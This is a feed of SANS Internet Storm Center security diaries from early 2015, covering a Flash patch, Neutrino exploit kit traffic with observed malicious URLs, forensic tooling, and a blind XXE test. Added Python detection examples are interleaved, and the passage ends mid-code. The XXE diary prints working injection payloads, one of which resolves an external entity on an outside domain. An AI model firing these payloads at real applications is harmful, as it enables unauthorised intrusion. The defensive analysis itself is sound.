Alerts

Adobe Flash Player Update Released, Fixing CVE-2015-0313, (Thu, Feb 5th)

Latest Alerts - Wed, 02/04/2015 - 16:16

An update has been released for Adobe Flash that, according to Adobe, fixes the recently discovered and actively exploited vulnerability CVE-2015-0313. Currently, the new version of Flash Player is only available as an auto-install update, not as a standalone download. To apply it, check for updates from within Adobe Flash. (Personal note: on my Mac, I have not seen the update offered yet.)

The new Flash player version that fixes the problem is 16.0.0.305. The old version is 16.0.0.296.

Adobe updated its bulletin to note the update: https://helpx.adobe.com/security/products/flash-player/apsa15-02.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Exploit Kit Evolution - Neutrino, (Wed, Feb 4th)

Latest Alerts - Wed, 02/04/2015 - 12:32

This is a guest diary submitted by Brad Duncan.

In September 2014, after the Neutrino exploit kit (EK) had been gone for 6 months, it reappeared in a different form. It was first identified as Job314 or Alter EK before Kafeine revealed in November 2014 that this traffic was a reboot of Neutrino [1].

This Storm Center diary examines Neutrino EK traffic patterns since it first appeared in the Spring of 2013.

Neutrino EK: 2013 through early 2014

Neutrino was first reported in March 2013 by Kafeine on his Malware Don't Need Coffee blog [2]. It was also reported by other sources, like Trend Micro [3].

Here's a sample of Neutrino EK from April 2013 using HTTP over port 80:

Shown above: Neutrino EK traffic from April 2013.

By the summer of 2013, we saw Neutrino use HTTP over port 8000, and the traffic patterns had evolved. Here's an example from June 2013, back when I first started blogging about malware traffic [4]:

Shown above: Neutrino EK traffic from June 18th, 2013.

In October 2013, Operation Windigo (an ongoing operation that has compromised thousands of servers since 2011) switched from using the Blackhole EK to Neutrino [5].

Before Neutrino EK disappeared in March of 2014, I usually found it in traffic associated with Operation Windigo. Here are two examples from February and March 2014 [6] [7]:

Shown above: Neutrino EK traffic from February 2nd, 2014.

Shown above: Neutrino EK traffic from March 8th, 2014.

March 2014 saw some reports about the EK's author selling Neutrino [8]. Later that month, Neutrino disappeared. We stopped seeing any sort of traffic or alerts on this EK.

Neutrino EK since December 2014

After Kafeine made his announcement and EmergingThreats released new signatures for this EK, I was able to infect a few VMs. Here's an example from November 2014 [9]:

Shown above: Neutrino EK traffic from November 29th, 2014.

Traffic patterns have remained relatively consistent since Neutrino reappeared. I infected a VM on February 2nd, 2015 using this EK. Below are the HTTP requests and responses to Neutrino EK on vupwmy.dout2.eu:12998.

  • GET /hall/79249/card/81326/aspect/sport/clear/16750/mercy/flash/clutch/1760/absorb/43160/conversation/universal/
  • HTTP/1.1 200 OK (text/html) - Landing page
  • GET /choice/34831/mighty/drift/hopeful/19742/fantastic/petunia/fine/12676/background/76767/seal/74018/street/20328/
  • HTTP/1.1 200 OK (application/x-shockwave-flash) - Flash exploit
  • GET /nowhere/44312/clad/29915/bewilder/career/pass/sinister/
  • HTTP/1.1 200 OK (text/html) - No actual text, about 25 to 30 bytes of data; shows up as "Malformed Packet" in Wireshark.
  • GET /marble/1931/batter/21963/dear/735/yesterday/6936/familiar/37370/smart/8962/move/37885/
  • HTTP/1.1 200 OK (application/octet-stream) - Encrypted malware payload
  • GET /lord.phtml?horror=64439&push=75359&pursuit=wash&fond=monsieur&wooden=forever&content=21179&despite=liberty&stalk=shiver&faithful=10081&bold=35942
  • HTTP/1.1 404 Not Found (text/html)
  • GET /america/86960/seven/quiet/blur/belong/traveller/12743/gigantic/96057/trunk/69375/await/30077/cunning/39832/betray/638/
  • HTTP/1.1 404 Not Found (text/html)

The malware payload sent by the EK is encrypted.

Shown above: Neutrino EK sends the malware payload.
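As an added example (not from the diary and not a vendor ruleset), here is a Python heuristic that looks for the request chain above in constructed proxy-log lines; the URL shape and the landing page, Flash, payload order are taken only from this February 2015 capture, so it is a starting point for a detection, not a signature.

```python
"""Heuristic detection of the Neutrino EK request chain described above.

Added example; not from the diary and not a vendor signature.  It works on
proxy-log lines reduced to: host "GET path HTTP/1.x" status content-type
(constructed inline below).  Assumptions: the URL shape (long paths of
lowercase words and integers, or a .phtml query whose values are words or
numbers) and the landing page -> Flash -> octet-stream order come from the
diary's February 2015 capture only.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

WORD = re.compile(r"^[a-z]+$")
NUM = re.compile(r"^\d+$")
LOG_RE = re.compile(
    r'^(?P<host>\S+) "GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3}) (?P<ctype>\S+)$'
)
# Content types in the order the diary shows them being served by the EK host
CHAIN = ["text/html", "application/x-shockwave-flash", "application/octet-stream"]


def looks_like_neutrino_path(url: str) -> bool:
    """True for the two URL shapes seen in the diary's capture."""
    u = urlsplit(url)
    if u.query:
        # /lord.phtml?horror=64439&push=75359... : word keys, word-or-number values
        pairs = [kv.split("=", 1) for kv in u.query.split("&") if "=" in kv]
        return (u.path.endswith(".phtml") and len(pairs) >= 5
                and all(WORD.match(k) and (WORD.match(v) or NUM.match(v)) for k, v in pairs))
    segs = [s for s in u.path.split("/") if s]
    if len(segs) < 8 or not u.path.endswith("/"):
        return False
    words = sum(1 for s in segs if WORD.match(s))
    nums = sum(1 for s in segs if NUM.match(s))
    # every segment is a bare word or integer, with a healthy mix of both
    return words + nums == len(segs) and words >= 4 and nums >= 2


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one reduced log line into host/path/status/ctype, or None."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_ek_chains(lines: Iterable[str]) -> Dict[str, List[str]]:
    """Map host:port -> the three matched paths for hosts that served the full
    chain (landing page, Flash exploit, octet-stream payload) over EK-looking URLs."""
    served: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == "200" and looks_like_neutrino_path(rec["path"]):
            served[rec["host"]].append((rec["ctype"], rec["path"]))
    hits: Dict[str, List[str]] = {}
    for host, items in served.items():
        remaining = iter(items)
        matched: List[str] = []
        for want in CHAIN:
            # advance through the remaining responses until this content type appears
            for ctype, path in remaining:
                if ctype == want:
                    matched.append(path)
                    break
            else:
                break  # ran out of responses before completing the chain
        if len(matched) == len(CHAIN):
            hits[host] = matched
    return hits


# Constructed sample log built from the diary's request list plus benign noise.
SAMPLE_LOG = """\
www.example.com "GET /news/2015/02/04/article/ HTTP/1.1" 200 text/html
vupwmy.dout2.eu:12998 "GET /hall/79249/card/81326/aspect/sport/clear/16750/mercy/flash/clutch/1760/absorb/43160/conversation/universal/ HTTP/1.1" 200 text/html
vupwmy.dout2.eu:12998 "GET /choice/34831/mighty/drift/hopeful/19742/fantastic/petunia/fine/12676/background/76767/seal/74018/street/20328/ HTTP/1.1" 200 application/x-shockwave-flash
vupwmy.dout2.eu:12998 "GET /nowhere/44312/clad/29915/bewilder/career/pass/sinister/ HTTP/1.1" 200 text/html
vupwmy.dout2.eu:12998 "GET /marble/1931/batter/21963/dear/735/yesterday/6936/familiar/37370/smart/8962/move/37885/ HTTP/1.1" 200 application/octet-stream
vupwmy.dout2.eu:12998 "GET /lord.phtml?horror=64439&push=75359&pursuit=wash&fond=monsieur&wooden=forever HTTP/1.1" 404 text/html
www.example.com "GET /images/logo.png HTTP/1.1" 200 image/png
""".splitlines()

if __name__ == "__main__":
    for host, paths in find_ek_chains(SAMPLE_LOG).items():
        print(host, "served landing -> flash -> payload:", paths)
```

Expect false positives from sites that use long word/number REST paths; the chain requirement (three content types in order from one host) is what keeps the noise down.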

I extracted the malware payload from the infected VM. If you're registered with Malwr.com, you can get a copy from:

https://malwr.com/analysis/NjFjNjQyYjBkMzVhNGE4MWE4Mjc1Mzk2NmQxNjFjM2E/

This malware is similar to previous Vawtrak samples I've seen from Neutrino and Nuclear EK last month [10] [11].

Closing Thoughts

Exploit kits tend to evolve over time. You might not realize how much an EK has changed until you look back through the traffic. Neutrino EK is no exception. It has evolved since it first appeared in 2013, and it changed significantly after reappearing in December 2014. It will continue to evolve, and many of us will continue to track those changes.

----------

Brad Duncan is a Security Researcher at Rackspace, and he runs a blog on malware traffic analysis at http://www.malware-traffic-analysis.net

References:

[1] http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html

[2] http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html

[3] http://blog.trendmicro.com/trendlabs-security-intelligence/a-new-exploit-kit-in-neutrino/

[4] http://malware-traffic-analysis.net/2013/06/18/index.html

[5] http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf

[6] http://malware-traffic-analysis.net/2014/02/02/index.html

[7] http://malware-traffic-analysis.net/2014/03/08/index.html

[8] http://news.softpedia.com/news/Neutrino-Exploit-Kit-Reportedly-Put-Up-for-Sale-by-Its-Author-430253.shtml

[9] http://www.malware-traffic-analysis.net/2014/12/01/index.html

[10] http://malware-traffic-analysis.net/2015/01/26/index.html

[11] http://www.malware-traffic-analysis.net/2015/01/29/index.html


February OUCH! Newsletter - Staying Secure on the Road: http://www.securingthehuman.org/ouch, (Wed, Feb 4th)

Latest Alerts - Wed, 02/04/2015 - 07:48

ISC StormCast for Wednesday, February 4th 2015 http://isc.sans.edu/podcastdetail.html?id=4341, (Wed, Feb 4th)

Latest Alerts - Tue, 02/03/2015 - 16:21

Another Network Forensic Tool for the Toolbox - Dshell, (Tue, Feb 3rd)

Latest Alerts - Tue, 02/03/2015 - 10:59

This is a guest diary written by Mr. William Glodek, Chief, Network Security Branch, U.S. Army Research Laboratory.

As a network analysis practitioner, I analyze multiple gigabytes of pcap data across multiple files on a daily basis. I have encountered many challenges where the standard tools (tcpdump, tcpflow, Wireshark/tshark) were either not flexible enough or could not be prototyped quickly enough to do specialized analyses in a timely manner. Either the analysis couldn't be done without recompiling the tool itself, or the plugin system was difficult to work with via command line tools.

Dshell, a Python-based network forensic analysis framework developed by the U.S. Army Research Laboratory, can help make that job a little easier [1]. The framework handles stream reassembly of both IPv4 and IPv6 network traffic and also includes geolocation and IP-to-ASN mapping data for each connection. It also enables development of network analysis plug-ins that help in understanding network traffic and present results to the user in a concise, useful manner, allowing users to parse and present data of interest from multiple levels of the network stack: from tweaking an existing decoder to extract slightly different information from an existing protocol, to writing a new parser for a completely novel protocol. Here are two scenarios where Dshell has decreased the time required to identify and respond to network forensic challenges.

  1. Malware authors will frequently embed a domain name in a piece of malware for improved command and control or resilience to security countermeasures such as IP blocking. When the attackers have completed their objective for the day, they minimize the network activity of the malware by updating the DNS record for the hostile domain to point to a non-Internet-routable IP address (e.g. 127.0.0.1).

     Dshell> decode -d reservedips *.pcap

     The reservedips module will find all of the DNS request/response pairs for domains that resolve to a non-routable IP address and display each of them on a single line. Because each result is on a single line, I can use other command line utilities like awk or grep to filter the results further. Dshell can also present the output in CSV format, which can be imported into many Security Information and Event Management (SIEM) tools or other analytic platforms.

  2. A drive-by-download attack is successful and a malicious executable is downloaded [2]. I need to find the network flow of the download of the malicious executable and extract the executable from the network traffic.

     Using the web module, I can inspect all the web traffic contained in the sample file. In the example below, a request for xzz1.exe with a successful server response is likely the malicious file.

     I can then extract the executable from the network traffic by using the rip-http module. The rip-http module will reassemble the IP/TCP/HTTP stream, identify the filename being requested, strip the HTTP headers, and write the data to disk with the appropriate filename.

There are additional modules within the Dshell framework to solve other challenges faced in network forensics. The ability to rapidly develop and share analytical modules is a core strength of Dshell. If you are interested in using or contributing to Dshell, please visit the project at https://github.com/USArmyResearchLab/Dshell.
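As an added example, not Dshell's own code, this Python reimplements the reservedips check described in scenario 1 on raw DNS responses: it parses A/AAAA answers, flags addresses that are not Internet-routable, and emits one line per request/response pair, including a CSV form. The messages are constructed inline with build_dns_response(), an assumption standing in for pcap input.

```python
"""Flag DNS answers that resolve to non-Internet-routable addresses.

Added example, not Dshell's own code: it reimplements the check the diary
attributes to the reservedips decoder on raw DNS response messages.
Assumptions: only A and AAAA answers are examined; the sample messages are
constructed inline with build_dns_response() instead of read from pcap.
"""
import ipaddress
import struct
from typing import List, Optional, Tuple


def _encode_name(name: str) -> bytes:
    """'example.com' -> b'\\x07example\\x03com\\x00' (uncompressed wire form)."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_dns_response(txid: int, qname: str, addrs: List[str]) -> bytes:
    """Constructed test data: a DNS response with one A/AAAA record per address."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(addrs), 0, 0)  # QR=1, RD, RA
    question = _encode_name(qname) + struct.pack("!HH", 1, 1)           # QTYPE A, IN
    answers = b""
    for a in addrs:
        ip = ipaddress.ip_address(a)
        rtype = 1 if ip.version == 4 else 28
        # 0xC00C is a compression pointer to the question name at offset 12
        answers += b"\xc0\x0c" + struct.pack("!HHIH", rtype, 1, 300, len(ip.packed)) + ip.packed
    return header + question + answers


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a (possibly compressed) name; return it and the offset after it."""
    labels, end, jumped = [], off, False
    while True:
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                        # compression pointer
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("ascii"))
        off += ln
    if not jumped:
        end = off
    return ".".join(labels), end


def parse_dns_response(msg: bytes) -> Tuple[int, str, List[str]]:
    """Return (transaction id, queried name, [answer IPs]) for A/AAAA answers."""
    txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    off, qname = 12, ""
    for _ in range(qdcount):
        qname, off = _read_name(msg, off)
        off += 4                                     # skip QTYPE and QCLASS
    ips: List[str] = []
    for _ in range(ancount):
        _owner, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype in (1, 28):                         # A or AAAA
            ips.append(str(ipaddress.ip_address(msg[off:off + rdlen])))
        off += rdlen
    return txid, qname, ips


def reserved_reason(addr: str) -> Optional[str]:
    """Why an address is not Internet-routable, or None if it is routable."""
    ip = ipaddress.ip_address(addr)
    for attr in ("is_unspecified", "is_loopback", "is_link_local",
                 "is_private", "is_multicast", "is_reserved"):
        if getattr(ip, attr):
            return attr[3:]
    return None


def find_reserved(messages: List[bytes]) -> List[Tuple[int, str, str, str]]:
    """One (txid, name, ip, reason) tuple per answer pointing at a reserved address."""
    hits = []
    for msg in messages:
        txid, qname, ips = parse_dns_response(msg)
        for ip in ips:
            reason = reserved_reason(ip)
            if reason:
                hits.append((txid, qname, ip, reason))
    return hits


def to_csv(hits: List[Tuple[int, str, str, str]]) -> List[str]:
    """CSV rows, the form the diary says Dshell can emit for import into a SIEM."""
    return ["txid,query,answer,reason"] + [f"{t:#06x},{q},{a},{r}" for t, q, a, r in hits]


if __name__ == "__main__":
    sample = [build_dns_response(0x1234, "c2.example.test", ["127.0.0.1"]),
              build_dns_response(0x1235, "www.example.test", ["93.184.216.34"])]
    print("\n".join(to_csv(find_reserved(sample))))
```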

[1] Dshell https://github.com/USArmyResearchLab/Dshell
[2] http://malware-traffic-analysis.net/2015/01/03/index.html


What is using this library?, (Tue, Feb 3rd)

Latest Alerts - Tue, 02/03/2015 - 08:54

Last year with OpenSSL, and this year with the GHOST glibc vulnerability, the question came up of which piece of software is using which specific library. This is a particularly challenging inventory problem. Most software does not document all of its dependencies well. Libraries can be statically compiled into a binary, or they can be loaded dynamically. In addition, updating a library on disk may not be sufficient if a particular piece of software uses a copy of the library that is already loaded in memory.

To solve the first problem, there is ldd. ldd will tell you which libraries will be loaded by a particular piece of software. For example:

$ ldd /bin/bash
linux-vdso.so.1 => (0x00007fff9677e000)
libtinfo.so.5 => /lib64/libtinfo.so.5 (0x00007fa397b43000)
libdl.so.2 => /lib64/libdl.so.2 (0x00007fa39793f000)
libc.so.6 => /lib64/libc.so.6 (0x00007fa3975aa000)
/lib64/ld-linux-x86-64.so.2 (0x00007fa397d72000)

The first line (linux-vdso) doesn't point to an actual library but to the Virtual Dynamic Shared Object, which represents kernel routines. Whenever you see an arrow (=>), it indicates that there is a symlink to the specific library that is being used. Another option that works quite well for shared libraries is readelf, e.g. readelf -d /bin/bash will list

To list libraries currently loaded, and programs that are using them, you can use lsof.

One trick with lsof is that it may abbreviate command names to make the output look better. To fix this, use the +c 0 option:

# lsof +c 0 | grep libc-
init 1 root mem REG 253,0 1726296 131285 /lib64/libc-2.5.so
udevd 836 root mem REG 253,0 131078 /lib64/libc-2.5.so (path inode=131285)
anvil 987 postfix mem REG 253,0 1726296 131285 /lib64/libc-2.5.so

The first column tells you which processes need restarting. Also, the number in front of the library (131285) is the inode of the library file. As you may note above, the inode is different for some of these entries, indicating that the library file changed on disk after the process mapped it. These are the processes that need restarting.

It is always best to reboot the system so you do not have to worry about remnants of the old code staying in memory.

In addition, if your system uses RPMs, you can find dependencies with rpm. But this information is not always complete.
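As an added example, not from the diary, here is a Python script that automates the inode comparison described above on lsof +c 0 output: a process whose mapped copy of a library has a different inode than the file now on disk is still running the old code. disk_inode() is the live os.stat lookup; the test substitutes a constructed inode table, and the three sample rows are the diary's.

```python
"""Find processes still mapping a replaced shared library from lsof output.

Added example, not from the diary.  It automates the diary's inode
comparison: a process whose mapped copy of a library has a different inode
than the file now on disk is running the old code and needs a restart.
Assumptions: lsof was run with +c 0 (full command names); the on-disk inode
is supplied by a lookup function (os.stat in real use, a constructed table
in the test).
"""
import os
import re
import sys
from typing import Callable, Iterable, List, NamedTuple, Optional, Set, Tuple

# lsof appends this note when the path's current inode differs from the mapped one
PATH_INODE_NOTE = re.compile(r"\(path inode=(\d+)\)")


class MappedLib(NamedTuple):
    command: str
    pid: int
    user: str
    inode: int                  # inode of the copy the process actually mapped
    path: str
    path_inode: Optional[int]   # lsof's own hint, when present


def parse_lsof_mem_rows(lines: Iterable[str]) -> List[MappedLib]:
    """Parse rows like:
    init 1 root mem REG 253,0 1726296 131285 /lib64/libc-2.5.so
    The SIZE/OFF column can be empty, so the NAME column is located by its
    leading '/' and the NODE (inode) column is the token just before it."""
    rows: List[MappedLib] = []
    for line in lines:
        parts = line.split()
        name_idx = next((i for i, t in enumerate(parts) if t.startswith("/")), None)
        if name_idx is None or name_idx < 5 or parts[3] != "mem" or parts[4] != "REG":
            continue
        try:
            pid, inode = int(parts[1]), int(parts[name_idx - 1])
        except ValueError:
            continue
        note = PATH_INODE_NOTE.search(line)
        rows.append(MappedLib(parts[0], pid, parts[2], inode, parts[name_idx],
                              int(note.group(1)) if note else None))
    return rows


def stale_mappings(rows: List[MappedLib],
                   current_inode: Callable[[str], Optional[int]]) -> List[MappedLib]:
    """Rows whose mapped inode differs from the inode the path has now."""
    stale = []
    for r in rows:
        now = current_inode(r.path)
        if now is None:
            now = r.path_inode           # fall back to lsof's hint
        if now is not None and now != r.inode:
            stale.append(r)
    return stale


def processes_to_restart(rows: List[MappedLib],
                         current_inode: Callable[[str], Optional[int]]) -> Set[Tuple[str, int]]:
    """Distinct (command, pid) pairs still running an old library copy."""
    return {(r.command, r.pid) for r in stale_mappings(rows, current_inode)}


def disk_inode(path: str) -> Optional[int]:
    """Live lookup for real use: inode of the file currently at path."""
    try:
        return os.stat(path).st_ino
    except OSError:
        return None


if __name__ == "__main__":
    # Usage: lsof +c 0 | grep libc- | python3 stale_libs.py
    for cmd, pid in sorted(processes_to_restart(parse_lsof_mem_rows(sys.stdin), disk_inode)):
        print(f"{cmd} (pid {pid}) still maps an old library copy; restart it")
```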

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


ISC StormCast for Tuesday, February 3rd 2015 http://isc.sans.edu/podcastdetail.html?id=4339, (Tue, Feb 3rd)

Latest Alerts - Mon, 02/02/2015 - 16:39

Friday Special Webcast: Lessons Learned from "Ghost" https://www.sans.org/webcasts/wrapping-ghost-lessons-learned-ghost-vulnerability-99642, (Mon, Feb 2nd)

Latest Alerts - Mon, 02/02/2015 - 07:49

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


New Adobe Flash Vulnerability - CVE-2015-0313, (Mon, Feb 2nd)

Latest Alerts - Mon, 02/02/2015 - 07:12

For those of you who are losing track, yet another Adobe Flash vulnerability has been unleashed on their unsuspecting users. I am sure we all know the wording off by heart by now, but just in case:

Vulnerability identifier: APSA15-02

CVE number : CVE-2015-0313

Platform: All Platforms

Quote: "A critical vulnerability (CVE-2015-0313) exists in Adobe Flash Player 16.0.0.296 and earlier versions for Windows and Macintosh. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system."

Trend Micro's write-up of the exploit seen in malvertisements: http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/

Steve Hall ISC Handler www.tarkie.net


ISC StormCast for Monday, February 2nd 2015 http://isc.sans.edu/podcastdetail.html?id=4337, (Mon, Feb 2nd)

Latest Alerts - Sun, 02/01/2015 - 20:21

Asset Inventory: Do you have yours?, (Sun, Feb 1st)

Latest Alerts - Sun, 02/01/2015 - 16:01

The year is hardly a month old and we have people racing around as if their hair is on fire, demanding to know if the glibc vulnerability CVE-2015-0235 (aka GHOST) [1] affects them. It's a reasonable certainty that this won't be the only time this year someone will be hammering on your door* wanting answers. And they want them now.

It's a fair question, given the impact certain vulnerabilities can have, but seemingly a large percentage of businesses can't immediately answer it. This is the part that doesn't make much sense. Knowing what software you have and which system it inhabits should be a basic business requirement, supported by IT [2]. Whether it be in a fancy cloud-based database or a simple spreadsheet (CSV format even), this information should be up to date and easily accessible. Shouldn't someone in the IT team/group/department/dark room in the basement know this already? Why are they asking the security team? Odd, isn't it, that when a problem pops up today and it's something to do with security, the expectation is that the security team should know the answer? Perhaps that's a simple testament to how good you are at getting answers, or, more likely, you're the most logical person to ask. (Well, it is an IT security problem; that nice media story/article/tweet has said so...) It becomes pretty easy to do the wrong thing here and play politics by pointing fingers and blaming someone else. So how do you avoid getting into this mess in the first place?

An up-to-date and complete asset list is worth its weight in gold for numerous folk within a company, so if the nice people in Audit and Compliance are maintaining it, it's time to make new friends. If one doesn't exist, then go meet with the people that can help create one and show them the value of doing this. You have to show the value to them and understand their perspective, as this can be a lot of work to keep current. Getting others to build and maintain the asset inventory because they see value and actual use in it avoids the "because my boss is making me do it" loathing issue. Any time someone fails to understand or realise the value of an asset inventory, it becomes the last thing on a very long to-do list. This means it never gets properly completed or updated, and we're back to the same problem again.

Socializing security requirements is about building a community of people that understand and ultimately care about being part of a more secure working environment. It's about talking to your workmates and explaining that helping you out with something as simple as an asset inventory can be good for the whole company. And what's good for the company is good for them.

So the next time someone bursts through your door, wide-eyed and panting over today's wittily titled vulnerability, you'll be able to give them the definitive answer. Then you can drop in "this wouldn't be possible without the help of ..." and give those other folks their due credit too.

The basics of an asset inventory list are straightforward; it needs: what is it, where is it, who owns it and what's on it. This will answer most of the basic questions or provide a starting point for more in-depth and complex questions with the right system owners. Basic asset inventories won't give you the answer to how many systems are vulnerable to something like CVE-2015-0235, but they will show how many systems, and which systems, are potentially vulnerable. That's a much better place to be.

Basic requirements of an asset Inventory data fields:

  • Make of the device
  • Model of the device
  • Serial Number of the device
  • Assigned asset tag number
  • System Name (assigned host name)
  • System Owner (who is responsible for the asset, both business and technical contacts)
  • Physical Location
  • Operating System
  • OS version level
  • Function (apps web server
  • Network location (e.g. internal workstation LAN, DMZ, Protected Internal network, etc.)
  • Business criticality (e.g. Low, Medium, High, Critical)

If you have any other suggestions or advice on getting a decent asset inventory in place and updated, please feel free to add a comment.

For the Australian readers - support your local con: CrikeyCon is back!

CrikeyCon is on Saturday, 21st February and is held in Brisbane, Australia. For more details go to http://crikeycon.com

Chris
--- Internet Storm Center Handler on Duty

[1] Critical GLibc Vulnerability CVE-2015-0235 (aka GHOST)
[2] And is on most of the critical controls lists, including: https://www.sans.org/critical-security-controls/control/2
* Real or virtual (email, IM, fax or telegram now seem to be doorways too)



Improving SSL Warnings, (Sun, Feb 1st)

Latest Alerts - Sun, 02/01/2015 - 08:44

One of the things that has concerned me for the last few years is how we are slowly creating a click-thru culture.

I honestly believe the intent is correct, but the implementation is faulty. The messages are not in tune with the average Internet user's knowledge level. In other words, the warnings are incomprehensible to my sister, my parents and my grandparents, the average Internet users of today. Given a choice between going to their favorite website or trusting an incomprehensible warning message... well, you know what happens next.

A team at Google has been looking at these issues and is driving browser changes in Chrome based on its research. As they point out, the vast majority of these errors are attributable to webmaster mistakes, with only a very small fraction being actual attacks.

The paper is Improving SSL Warnings: Comprehension and Adherence, and there is an accompanying presentation.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Beware of Phishing and Spam Super Bowl Fans!, (Sat, Jan 31st)

Latest Alerts - Fri, 01/30/2015 - 20:43

Beware of Super Bowl spam that may come to your email inbox this weekend. The big game is Sunday, and the spam and phishing emails are pouring in, complete with "helpful" links backed by malware and/or credential harvesting, of course.

It's worth reminding friends and family that if they see any emails about the Super Bowl that appear too good to be true, they should simply delete them. Be safe!



-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


ISC StormCast for Friday, January 30th 2015 http://isc.sans.edu/podcastdetail.html?id=4335, (Fri, Jan 30th)

Latest Alerts - Thu, 01/29/2015 - 20:05

Blindly confirming XXE, (Thu, Jan 29th)

Latest Alerts - Thu, 01/29/2015 - 10:43

Almost exactly a year ago I posted a diary called "Is XXE the new SQLi?"; you can read it at https://isc.sans.edu/diary/Is+XXE+the+new+SQLi/17375. In the last year, things have not changed a lot regarding XXE vulnerabilities. They still seem to be popping up here and there, depending on how XML documents are consumed by server-side applications.

Recently I had an interesting engagement where the server-side web application consumed an XML document submitted by a user (through a web browser, in an HTTP POST request). Of course, whenever you see XML being used, you should always test for the existence of XXE vulnerabilities, since their impact can be quite serious (check the original diary) and can range from Denial of Service attacks to disclosure of arbitrary files.

In this specific case, however, the problem was that while the application processed the submitted XML document, it never output anything from the document: the application would only echo back whether processing was successful or not.

So the question that came to mind was how to confirm whether the target application was vulnerable to XXE. Sure, I could try to launch a DoS attack to see if it works or not, but since I was dealing with a semi-production system, this was not an option.

Almost like blind SQL injection

This case is very similar to blind SQL injection vulnerabilities: we can modify the input and, while we cannot see the output directly, we can deduce what happened on the server side. Let's take a simplified version of the submitted XML document:

<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>Test</DocumentPointer>
  </Document>
</DocumentLayer>

Of course, in the real test the XML document was much more complex and had some logic for the backend application: the DocumentPointer element had to contain the text string Test. The first check is an internal entity that expands to exactly that string, referenced from the DocumentPointer element:

<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe "Test">
]>
<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>&xxe;</DocumentPointer>
  </Document>
</DocumentLayer>

Simple! If this works, it means that we have blindly confirmed that the XML processor on the server side used our reference to the xxe entity. Cool.

The next step is to see if we can use external entities. However, again, since we cannot see the results of the XXE injection, it's not all that simple. To make things more complex, the backend server is behind a firewall that does not let this machine connect directly to anything on the Internet. This stops us from using a SYSTEM external entity with a URL supplied.

So is there any other way to confirm that external entities are supported? Probably yes: there is one protocol that is almost always allowed, in one sense or another: DNS. In this particular case, this means that we can craft an external entity that will resolve to a domain name we control; by checking the DNS requests we can see whether the entity was resolved or not. In this case it does not matter if the backend server can access the Internet or not:

<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe SYSTEM "http://thisdomaindoesnotexist.infigo.hr/test.txt">
]>
<DocumentLayer>
  <Document InternalID="1">
    <DocumentPointer>&xxe;</DocumentPointer>
  </Document>
</DocumentLayer>

While this document will not be processed correctly (remember, the DocumentPointer element must contain the text string Test), the reference will be resolved by the XML processor, and by observing the DNS traffic on the DNS servers for our domain we will see a request for the submitted hostname, which allows us to confirm that XXEs are resolved by the target application.

So, to wrap things up: we blindly confirmed the XXE vulnerability in the target application. While in this case our exploitation options are unfortunately limited to DoS, it is worth noting that the vulnerability exists, and that it's only a matter of time before it can be abused further, unless patched.
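As an added example, not from the diary, here is how the consuming application could refuse the probe documents shown above before its XML processor resolves anything: it uses Python's expat bindings as an inspector, with the diary's three documents reconstructed inline as constructed input, and assumes the application never legitimately needs a DTD, so any DOCTYPE or entity declaration is logged and the document rejected.

```python
"""Reject submitted XML that carries a DTD before the application parses it.

Added example, not from the diary.  The three documents the diary used to
probe the application are reconstructed inline as constructed input; the
plain one is accepted, the two with a DOCTYPE are refused and the entity
declarations (including any SYSTEM identifier) are recorded for logging.
Assumptions: the application never needs a DTD, so any DOCTYPE is a signal;
Python's expat bindings (xml.parsers.expat) are used as the inspector.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat
from typing import Dict, List, NamedTuple, Optional


class DtdFinding(NamedTuple):
    kind: str                  # "doctype" or "entity"
    name: str
    system_id: Optional[str]   # set when an external (SYSTEM) resource was named


class DtdRejected(Exception):
    def __init__(self, findings: List[DtdFinding]):
        super().__init__(f"DTD present: {findings}")
        self.findings = findings


def inspect_dtd(doc: bytes) -> List[DtdFinding]:
    """Walk the document with expat, resolving nothing, and collect declarations."""
    findings: List[DtdFinding] = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings.append(DtdFinding("doctype", name, sysid))

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        findings.append(DtdFinding("entity", name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        return 0   # a false return makes expat abort instead of fetching sysid

    p.StartDoctypeDeclHandler = on_doctype
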